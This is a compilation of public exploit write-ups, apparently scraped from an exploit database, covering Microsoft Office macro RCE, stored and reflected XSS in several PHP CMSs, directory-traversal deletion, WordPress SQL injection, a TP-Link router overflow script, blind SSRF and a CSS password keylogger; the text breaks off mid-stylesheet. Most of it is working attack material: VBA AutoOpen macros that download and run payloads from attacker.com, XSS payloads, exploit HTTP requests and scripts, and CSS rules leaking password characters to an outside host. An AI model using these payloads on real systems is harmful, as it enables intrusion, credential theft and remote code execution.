ISHACK AI BOT

## Title: Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE) ## Author: nu11secur1ty ## Date: 04.17.2023 ## Vendor: https://www.microsoft.com/ ## Software: https://www.microsoft.com/en-us/microsoft-365/ ## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/ ## CVE-2023-28285 ## Description: The attack itself is carried out locally by a user with authentication to the targeted system. An attacker could exploit the vulnerability by convincing a victim, through social engineering, to download and open a specially crafted file from a website which could lead to a local attack on the victim's computer. The attacker can trick the victim to open a malicious web page by using a malicious `Word` file for `Office-365 API`. After the user will open the file to read it, from the API of Office-365, without being asked what it wants to activate, etc, he will activate the code of the malicious server, which he will inject himself, from this malicious server. Emedietly after this click, the attacker can receive very sensitive information! For bank accounts, logs from some sniff attacks, tracking of all the traffic of the victim without stopping, and more malicious stuff, it depends on the scenario and etc. STATUS: HIGH Vulnerability [+]Exploit: The exploit server must be BROADCASTING at the moment when the victim hit the button of the exploit! [+]PoC: ```cmd Sub AutoOpen() Call Shell("cmd.exe /S /c" & "curl -s http://attacker.com/CVE-2023-28285/PoC.debelui | debelui", vbNormalFocus) End Sub ``` ## FYI: The PoC has a price and this report will be uploaded with a description and video of how you can reproduce it only. ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28285) ## Proof and Exploit [href](https://www.nu11secur1ty.com/2023/04/cve-2023-28285-microsoft-office-remote.html) ## Time spend: 01:30:00

Exploit Title: WebsiteBaker v2.13.3 - Stored XSS Application: WebsiteBaker Version: 2.13.3 Bugs: Stored XSS Technology: PHP Vendor URL: https://websitebaker.org/pages/en/home.php Software Link: https://wiki.websitebaker.org/doku.php/en/downloads Date of found: 26.06.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. login to account 2. go to media 3. upload svg file """ <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> """ 4. go to svg file (http://localhost/media/malas.svg)

Exploit Title: WebsiteBaker v2.13.3 - Directory Traversal Application: WebsiteBaker Version: 2.13.3 Bugs: Directory Traversal Technology: PHP Vendor URL: https://websitebaker.org/pages/en/home.php Software Link: https://wiki.websitebaker.org/doku.php/en/downloads Date of found: 26.06.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================= arbitary directory deleting GET /admin/media/delete.php?dir=/../../../../../..//var/www&id=a838b6ebe8ba43a0 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://localhost/admin/media/browse.php?dir=/../../../../../..//var/www Cookie: PHPSESSID-WB-6e6c39=bvnampsc5ji2drm439ph49143c; klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin

## Title:Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE) ## Author: nu11secur1ty ## Date: 06.27.2023 ## Vendor: https://www.microsoft.com/ ## Software: https://www.microsoft.com/en-us/microsoft-365/excel ## Reference: https://portswigger.net/daily-swig/rce ## CVE-2023-33137 ## Description: This exploit is connected with third part exploit server, which waits for the victim to call him and execute the content from him using the pipe posting method! This is absolutely a 0-day exploit! This is absolutely dangerous for the victims, who are infected by him! When the victim hit the button in the Excel file, it makes a POST request to the exploit server, and the server is responding back that way: He creates another hidden malicious file and executed it directly on the machine of the victim, then everything is disappeared, so nasty. STATUS: HIGH Vulnerability WARNING: THIS IS VERY DANGER for the usual users! [+]Exploit: ```vbs Sub AutoOpen() Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/nu11secur1ty/somwhere/ontheinternet/maloumnici.bat > maloumnici.bat && .\maloumnici.bat", vbNormalFocus) End Sub ``` ## Reproduce: [href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33137) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/06/microsoft-excel-microsoft-365-mso.html) ## Time spend: 01:27:00

# Exploit Title: D-Link DAP-1325 - Broken Access Control # Date: 27-06-2023 # Exploit Author: ieduardogoncalves # Contact : twitter.com/0x00dia # Vendor : www.dlink.com # Version: Hardware version: A1 # Firmware version: 1.01 # Tested on:All Platforms 1) Description Security vulnerability known as "Unauthenticated access to settings" or "Unauthenticated configuration download". This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication. IN MY CASE, Tested repeater IP: http://192.168.0.21/ Video POC : https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0 2) Proof of Concept Step 1: Go to Repeater Login Page : http://192.168.0.21/ Step 2: Add the payload to URL. Payload: http://{ip}/cgi-bin/ExportSettings.sh Payload: https://github.com/eeduardogoncalves/exploit

## Exploit Title: spip v4.1.10 - Spoofing Admin account ## Author: nu11secur1ty ## Date: 06.29.2023 ## Vendor: https://www.spip.net/en_rubrique25.html ## Software: https://files.spip.net/spip/archives/spip-v4.1.10.zip ## Reference: https://www.crowdstrike.com/cybersecurity-101/spoofing-attacks/ ## Description: The malicious user can upload a malicious SVG file which file is not filtered by a security function, and he can trick the administrator of this system to check his logo by clicking on him and visiting, maybe a very dangerous URL. Wrong web app website logic, and not well sanitizing upload function. STATUS: HIGH- Vulnerability [+]Exploit: ```SVG <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"> <defs> <linearGradient id="badgeGradient"> <stop offset="0"/> <stop offset="1"/> </linearGradient> </defs> <g id="heading"> <a xlink:href= "https://rb.gy/74f0y"> <path id="badge" d="M 29.6,22.8 C 29.2,23.4 24.3,22.4 23.8,22.9 C 23.4,23.3 24.3,28.3 23.8,28.6 C 23.2,28.9 19.4,25.6 18.8,25.8 C 18.2,26.0 16.5,30.7 15.8,30.7 C 15.2,30.7 13.5,26.0 12.9,25.8 C 12.3,25.6 8.5,28.9 7.9,28.6 C 7.4,28.3 8.3,23.3 7.9,22.9 C 7.4,22.4 2.4,23.4 2.1,22.8 C 1.8,22.3 5.1,18.4 4.9,17.8 C 4.8,17.2 0.0,15.5 0.0,14.9 C 0.0,14.3 4.8,12.6 4.9,12.0 C 5.1,11.4 1.8,7.5 2.1,7.0 C 2.4,6.4 7.4,7.3 7.9,6.9 C 8.3,6.5 7.4,1.5 7.9,1.2 C 8.5,0.9 12.3,4.1 12.9,4.0 C 13.5,3.8 15.2,-0.8 15.8,-0.8 C 16.5,-0.8 18.2,3.8 18.8,4.0 C 19.4,4.1 23.2,0.9 23.8,1.2 C 24.3,1.5 23.4,6.5 23.8,6.9 C 24.3,7.3 29.2,6.4 29.6,7.0 C 29.9,7.5 26.6,11.4 26.8,12.0 C 26.9,12.6 31.7,14.3 31.7,14.9 C 31.7,15.5 26.9,17.2 26.8,17.8 C 26.6,18.4 29.9,22.3 29.6,22.8 z"/> <!--<text id="label" x="5" y="20" transform = "rotate(-15 10 10)">New</text>--> <text id="title" x="40" y="20">Please click on the logo, to see our design services, on our website, thank you!</text> </a> </g> </svg> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/SPIP/SPIP-4.1.10) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/06/spip-v4110-spoofing-admin-account.html) ## Time spend: 00:37:00

# Exploit Title: Time Slot Booking Calendar 1.8 - Stored XSS # Date: 29/06/2023 # Exploit Author: CraCkEr # Vendor: GZ Scripts # Vendor Homepage: https://gzscripts.com/ # Software Link: https://gzscripts.com/time-slot-booking-calendar-php.html # Version: 1.8 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Release Notes: Allow Attacker to inject malicious code into website, give ability to steal sensitive information, manipulate data, and launch additional attacks. ## Stored XSS ----------------------------------------------- POST /TimeSlotBookingCalendarPHP/load.php?controller=GzFront&action=booking_details&cid=1 HTTP/1.1 promo_code=&title=prof&male=female&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=&address_1=[XSS Payload]&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&captcha=rtznqs&terms=1&cal_id=1&calendar_id=1 ----------------------------------------------- POST parameter 'first_name' is vulnerable to XSS POST parameter 'second_name' is vulnerable to XSS POST parameter 'phone' is vulnerable to XSS POST parameter 'address_1' is vulnerable to XSS POST parameter 'country' is vulnerable to XSS ## Steps to Reproduce: 1. As a [Guest User] Choose any Day Colored by Green on the Calendar - Click on [+] near Start/End Time - Press [Booking] 2. Inject your [XSS Payload] in "First Name" 3. Inject your [XSS Payload] in "Last Name" 4. Inject your [XSS Payload] in "Phone" 5. Inject your [XSS Payload] in "Address Line 1" 6. Inject your [XSS Payload] in "Country" 7. Accept with terms & Press [Booking] XSS Fired on Local User Browser 8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard) XSS Will Fire and Executed on his Browser 9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index) XSS Will Fire and Executed on his Browser 10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php?controller=GzInvoice&action=index) XSS Will Fire and Executed on his Browser [-] Done

# Exploit Title: GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS) # Date: 30/06/2023 # Exploit Author: CraCkEr # Vendor: GZ Scripts # Vendor Homepage: https://gzscripts.com/ # Software Link: https://gzscripts.com/gz-forum-script.html # Version: 1.8 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Release Notes: Reflected XSS: The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Stored XSS Allow Attacker to inject malicious code into website, give ability to steal sensitive information, manipulate data, and launch additional attacks. ## Reflected XSS Path: /preview.php GET 'catid' parameter is vulnerable to RXSS http://www.website/preview.php?controller=Load&action=index&catid=moztj%22%3e%3cscript%3ealert(1)%3c%2fscript%3ems3ea&down_up=a Path: /preview.php GET 'topicid' parameter is vulnerable to RXSS http://www.website/preview.php?controller=Load&action=topic&topicid=1wgaff%22%3e%3cscript%3ealert(1)%3c%2fscript%3exdhk2 ## Stored XSS ----------------------------------------------- POST /GZForumScript/preview.php?controller=Load&action=start_new_topic HTTP/1.1 -----------------------------39829578812616571248381709325 Content-Disposition: form-data; name="free_name" <script>alert(1)</script> -----------------------------39829578812616571248381709325 Content-Disposition: form-data; name="topic" <script>alert(1)</script> -----------------------------39829578812616571248381709325 Content-Disposition: form-data; name="topic_message" <script>alert(1)</script> -----------------------------39829578812616571248381709325-- ----------------------------------------------- POST parameter 'free_name' is vulnerable to XSS POST parameter 'topic' is vulnerable to XSS POST parameter 'topic_message' is vulnerable to XSS ## Steps to Reproduce: 1. As a [Guest User] Click on [New Topic] to create a "New Topic" on this Path (http://website/preview.php?controller=Load&action=start_new_topic) 2. Inject your [XSS Payload] in "Name" 3. Inject your [XSS Payload] in "Topic Title " 4. Inject your [XSS Payload] in "Topic Message" 5. Submit 4. XSS Fired on Visitor Browser's when they Visit the Topic you Infect your [XSS Payload] on 5. XSS Fired on ADMIN Browser when he visit [Dashboard] in Administration Panel on this Path (https://website/GzAdmin/dashboard) 6. XSS Fired on ADMIN Browser when he visit [Topic] & [All Topics] to check [New Topics] on this Path (https://website/GzTopic/index)

# Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi # Date: 30/06/2023 # Exploit Author: Matin nouriyan (matitanium) # Version: <= 1.0.4 # CVE: CVE-2022-4297 Vendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/ # Tested on: Kali linux --------------------------------------- The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX available to unauthenticated users, leading to an unauthenticated SQL injection -------------------------------------- How to Reproduce this Vulnerability: 1. Install WP AutoComplete <= 1.0.4 2. WP AutoComplete <= 1.0.4 using q parameter for ajax requests 3. Find requests belong to WP AutoComplete like step 5 4. Start sqlmap and exploit 5. python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000&timestamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p q

# Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow # Date: 2023-06-30 # country: Iran # Exploit Author: Amirhossein Bahramizadeh # Category : hardware # Dork : /userRpm/WanDynamicIpV6CfgRpm # Tested on: Windows/Linux # CVE : CVE-2023-36355 import requests # Replace the IP address with the router's IP router_ip = '192.168.0.1' # Construct the URL with the vulnerable endpoint and parameter url = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart=' # Replace the payload with a crafted payload that triggers the buffer overflow payload = 'A' * 5000 # Example payload, adjust the length as needed # Send the GET request with the crafted payload response = requests.get(url + payload) # Check the response status code if response.status_code == 200: print('Buffer overflow triggered successfully') else: print('Buffer overflow not triggered')

# Exploit Title: Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS) # Date: 30/06/2023 # Exploit Author: CraCkEr # Vendor: GZ Scripts # Vendor Homepage: https://gzscripts.com/ # Software Link: https://gzscripts.com/vacation-rental-website.html # Version: 1.8 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Stored XSS ------------------------------------------------------------ POST /VacationRentalWebsite/property/8/ad-has-principes/ HTTP/1.1 property_id=8&action=detail&send_review=1&cleanliness=0%3B4.2&comfort=0%3B4.2&location=0%3B4.2&service=0%3B4.2&sleep=0%3B4.2&price=0%3B4.2&username=[XSS Payload]&evaluation=3&title=[XSS Payload]&comment=[XSS Payload]&captcha=lbhkyj ------------------------------------------------------------ POST parameter 'username' is vulnerable to XSS POST parameter 'title' is vulnerable to XSS POST parameter 'comment' is vulnerable to XSS ## Steps to Reproduce: 1. Surf (as Guest) - Go to any Listed Property 2. Go to [Customer Reviews] on this Path (http://website/property/[Number1-9]/[name-of-Property]/#customerReviews) 3. Inject your [XSS Payload] in "Username" 4. Inject your [XSS Payload] in "Title" 5. Inject your [XSS Payload] in "Comment" 6. Submit 7. XSS Fired on Local Browser 8. XSS will Fire & Execute on Visitor's Browser when they visit the page of Property you [Inject] the XSS Payloads in & XSS will Fire also on the [Reviews Page] Note: I think Administration Panel missing a section to Manage [Reviews] on the website this feature must be added in next Updates [View/Edit/Delete]

Exploit Title: Prestashop 8.0.4 - Cross-Site Scripting (XSS) Application: prestashop Version: 8.0.4 Bugs: Stored XSS Technology: PHP Vendor URL: https://prestashop.com/ Software Link: https://prestashop.com/prestashop-edition-basic/ Date of found: 30.06.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Go to Catalog => Products 2. Select arbitary product 2. upload malicious svg file svg file content ===> <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> poc request: POST /admin253irhit4jjbd9gurze/filemanager/upload.php HTTP/1.1 Host: localhost Content-Length: 756 sec-ch-ua: sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzp0EwYSQ0YSV2sCZ Accept: application/json Cache-Control: no-cache X-Requested-With: XMLHttpRequest sec-ch-ua-platform: "" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/admin253irhit4jjbd9gurze/filemanager/dialog.php?type=1&descending=false&sort_by=&lang=en Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=jcsq33e9kk7sk5m3bssjvhhggt; PrestaShop-c1c78947c88162eb206771df4a41c662=def502004dd8c2a1335b9be53c804392b0a2c75cff9bdb5c19cd61a5607c418b0f035c998ecf5b54c45e92f99c4e4e01cfab3d0af19e89f664379d034eef9fb26cda14713d019a4c3be8322c0f43be6eee245f9ab58a590058989b65701b1894d2a6857c3a6f542b71501ea0d8695e3642ec9a317c99be7a752cbf54a31af3eb042f935dbfb7586d53e0c1cc72d965c806e666b150a3f5ca5327512a5577ab2d4038a0fc521f9c4092b5f7bcd031fb09250d825bfa0d3b68e8f0329bf725bcd2565aa0997c4f352d0f156cd3b5fa922de6a77f46eb1dae7dbac79b172597d56d3f842b91d25354e597c14c618ffb5efa795611ffb3e04cedbeb33d6d8cc0da28ac1a432a8a310c18a1a449568a7aa66c744379e23be16563e8ff26b5cd8694c1e7fe43344710a55677527c7f90348e6daf7d438827b3ad748e99afe6842a508b14dc754fecfc5d0706869b34a9dd7630b12694c5ed865ccacacb9b05d58d6d92; PrestaShop-8edfcba6bf6b77ff3bb3d94e0228b048=def50200a47caf7b8d80335ae708e2f3182075135ab6b23986be859d96bde645e28f7b847b9dd1947867a8d1a976e10bb88d799f690ed85266f0515212c75d60115e5998f3bd6d69df4038125dbe6a3df081ea53a363959d276aa046f958ad7f100b252e6305ab0a36808ef58868ab8bf11e941729eca845709d45578deac87d18771aeb7b93dc1652344a89b5223994c68dc5f72f137d7d41708ade1916630e768b005ea48bb063db2de8a4e93bb8142c5206c73a72c33bcace8bcc7a0f9d9ba713590261f8ddee4692955709b631566c1097acf6766a1daa41e44b497834da8685e2156b0fe90abd0c0b47d24db358a7440c1469394ac302c800a01366b463aba2957206f8b09a43d9d1fc5f524a4e77d7a6ca7d09d60c9aa1ee155262e02267260abec3ca148d5a20d1d4a3a50c8d4abcaefae11d4503f7e5e72ee766b53507603e7a7573cabd45f7a56208658e00d5230f2e4b4bf1c8a45afa0de3a96883723fedf705ff1a96bbf6ac80fdcde5a9631148b7b9356bc4904774d705e0986081c7609c64f0f11c0f5f2b8d10a578db400373c02e333252ec319d517b92f01479a39b2bde7826b488e1ba64613c485146fc3d130e0da627672409b11210976cb8bbe70312cbc94a9bddceec917ee633efdd241fcfc2106a0a49cc7bdeb13928786bad26a00b9cc78c08e5e6ff55 Connection: close ------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ Content-Disposition: form-data; name="path" ------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ Content-Disposition: form-data; name="path_thumb" ------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ Content-Disposition: form-data; name="file"; filename="malas.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> ------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ--

# Exploit Title: Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS) # Date: 1/07/2023 # Exploit Author: tmrswrr # Vendor Homepage: http://www.opencms.org # Software Link: https://github.com/alkacon/opencms-core # Version: v15.0 POC: 1 ) Login in demo page , go to this url https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/.galleries/livedemo/!! 2 ) Click /.galleries/ , after right click any png file , open gallery, write in search button this payload <img src=. onerror=alert(document.domain)> 3 ) You will be see alert box POC: 1 ) Go to this url , right click any png file, rename title section and write your payload : <img src=. onerror=alert(document.domain)> https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/230701/ld_go87op3bfy/.galleries/images/!! 2 ) You will be see alert box , stored xss POC: 1 ) Go to this url , right click any png file and choose replace , click change file and choose your svg file after save it svg file: <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert("XSS"); </script> </svg> 2 ) When click this svg file you will be see alert button

#Exploit Title: PodcastGenerator 3.2.9 - Blind SSRF via XML Injection #Application: PodcastGenerator #Version: v3.2.9 #Bugs: Blind SSRF via XML Injection #Technology: PHP #Vendor URL: https://podcastgenerator.net/ #Software Link: https://github.com/PodcastGenerator/PodcastGenerator #Date of found: 01-07-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Go to 'Upload New Episodes' (http://localhost/PodcastGenerator/admin/episodes_upload.php) 2. Fill all section and Short Description section set as 'test]]></shortdescPG><imgPG path="">( example :Attacker domain)http://localhost:3132</imgPG><shortdescPG><![CDATA[test' payload: test]]></shortdescPG><imgPG path="">http://localhost:3132</imgPG><shortdescPG><![CDATA[test By the way i used localhost.If you have domain, you can use domain. 3.And upload episodes 4. I am listening on port 3132 because I'm observating for incoming requests nc -lvp 3132 5. And I receive request request: POST /PodcastGenerator/admin/episodes_upload.php HTTP/1.1 Host: localhost Content-Length: 101563 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypRUTcUa48pmEcI6Q User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/PodcastGenerator/admin/episodes_upload.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=rsvvc28on2q91ael2fiou3nad3 Connection: close ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="file"; filename="2023-07-01_2023-07-01_2023-07-01_4_photo-1575936123452-b67c3203c357_1_ (2).jpeg" Content-Type: image/jpeg image content blaaahblahasdfjblaaah;sdfblaaahasdf asdfasdfadddblaaahdblaaahddddblaaahddddddblaaahblaaahblaaahdddblaaahddddblaaahdblaaahddblaaahdddddblaaahddddddddddd ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="title" test ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="shortdesc" test]]></shortdescPG><imgPG path="">http://localhost:3132</imgPG><shortdescPG><![CDATA[test ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="date" 2023-07-01 ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="time" 17:02 ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="episodecover"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="longdesc" test ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="episodenum" 33 ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="seasonnum" 33 ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="itunesKeywords" ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="explicit" no ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="authorname" ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="authoremail" ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="customtags" ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="token" vdzM0jc75uLMHV7ovxew8Dawh5mnWSpz ------WebKitFormBoundarypRUTcUa48pmEcI6Q--

Exploit Title: WBCE CMS 1.6.1 - Open Redirect & CSRF Version: 1.6.1 Bugs: Open Redirect + CSRF = CSS KEYLOGGING Technology: PHP Vendor URL: https://wbce-cms.org/ Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1 Date of found: 03-07-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== 1. Login to Account 2. Go to Media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/index.php#elf_l1_Lw) 3. Then you upload html file .(html file content is as below) ''' <html> <head> <title> Login </title> <style> input[type="password"][value*="q"]{ background-image: url('https://enflownwx6she.x.pipedream.net/q');} input[type="password"][value*="w"]{ background-image: url('https://enflownwx6she.x.pipedream.net/w');} input[type="password"][value*="e"]{ background-image: url('https://enflownwx6she.x.pipedream.net/e');} input[type="password"][value*="r"]{ background-image: url('https://enflownwx6she.x.pipedream.net/r');} input[type="password"][value*="t"]{ background-image: url('https://enflownwx6she.x.pipedream.net/t');} input[type="password"][value*="y"]{ background-image: url('https://enflownwx6she.x.pipedream.net/y');} input[type="password"][value*="u"]{ background-image: url('https://enflownwx6she.x.pipedream.net/u');} input[type="password"][value*="i"]{ background-image: url('https://enflownwx6she.x.pipedream.net/i');} input[type="password"][value*="o"]{ background-image: url('https://enflownwx6she.x.pipedream.net/o');} input[type="password"][value*="p"]{ background-image: url('https://enflownwx6she.x.pipedream.net/p');} input[type="password"][value*="a"]{ background-image: url('https://enflownwx6she.x.pipedream.net/a');} input[type="password"][value*="s"]{ background-image: url('https://enflownwx6she.x.pipedream.net/s');} input[type="password"][value*="d"]{ background-image: url('https://enflownwx6she.x.pipedream.net/d');} input[type="password"][value*="f"]{ background-image: url('https://enflownwx6she.x.pipedream.net/f');} input[type="password"][value*="g"]{ background-image: url('https://enflownwx6she.x.pipedream.net/g');} input[type="password"][value*="h"]{ background-image: url('https://enflownwx6she.x.pipedream.net/h');} input[type="password"][value*="j"]{ background-image: url('https://enflownwx6she.x.pipedream.net/j');} input[type="password"][value*="k"]{ background-image: url('https://enflownwx6she.x.pipedream.net/k');} input[type="password"][value*="l"]{ background-image: url('https://enflownwx6she.x.pipedream.net/l');} input[type="password"][value*="z"]{ background-image: url('https://enflownwx6she.x.pipedream.net/z');} input[type="password"][value*="x"]{ background-image: url('https://enflownwx6she.x.pipedream.net/x');} input[type="password"][value*="c"]{ background-image: url('https://enflownwx6she.x.pipedream.net/c');} input[type="password"][value*="v"]{ background-image: url('https://enflownwx6she.x.pipedream.net/v');} input[type="password"][value*="b"]{ background-image: url('https://enflownwx6she.x.pipedream.net/b');} input[type="password"][value*="n"]{ background-image: url('https://enflownwx6she.x.pipedream.net/n');} input[type="password"][value*="m"]{ background-image: url('https://enflownwx6she.x.pipedream.net/m');} input[type="password"][value*="Q"]{ background-image: url('https://enflownwx6she.x.pipedream.net/Q');} input[type="password"][value*="W"]{ background-image: url('https://enflownwx6she.x.pipedream.net/W');} input[type="password"][value*="E"]{ background-image: url('https://enflownwx6she.x.pipedream.net/E');} input[type="password"][value*="R"]{ background-image: url('https://enflownwx6she.x.pipedream.net/R');} input[type="password"][value*="T"]{ background-image: url('https://enflownwx6she.x.pipedream.net/T');} input[type="password"][value*="Y"]{ background-image: url('https://enflownwx6she.x.pipedream.net/Y');} input[type="password"][value*="U"]{ background-image: url('https://enflownwx6she.x.pipedream.net/U');} input[type="password"][value*="I"]{ background-image: url('https://enflownwx6she.x.pipedream.net/I');} input[type="password"][value*="O"]{ background-image: url('https://enflownwx6she.x.pipedream.net/O');} input[type="password"][value*="P"]{ background-image: url('https://enflownwx6she.x.pipedream.net/P');} input[type="password"][value*="A"]{ background-image: url('https://enflownwx6she.x.pipedream.net/A');} input[type="password"][value*="S"]{ background-image: url('https://enflownwx6she.x.pipedream.net/S');} input[type="password"][value*="D"]{ background-image: url('https://enflownwx6she.x.pipedream.net/D');} input[type="password"][value*="F"]{ background-image: url('https://enflownwx6she.x.pipedream.net/F');} input[type="password"][value*="G"]{ background-image: url('https://enflownwx6she.x.pipedream.net/G');} input[type="password"][value*="H"]{ background-image: url('https://enflownwx6she.x.pipedream.net/H');} input[type="password"][value*="J"]{ background-image: url('https://enflownwx6she.x.pipedream.net/J');} input[type="password"][value*="K"]{ background-image: url('https://enflownwx6she.x.pipedream.net/K');} input[type="password"][value*="L"]{ background-image: url('https://enflownwx6she.x.pipedream.net/L');} input[type="password"][value*="Z"]{ background-image: url('https://enflownwx6she.x.pipedream.net/Z');} input[type="password"][value*="X"]{ background-image: url('https://enflownwx6she.x.pipedream.net/X');} input[type="password"][value*="C"]{ background-image: url('https://enflownwx6she.x.pipedream.net/C');} input[type="password"][value*="V"]{ background-image: url('https://enflownwx6she.x.pipedream.net/V');} 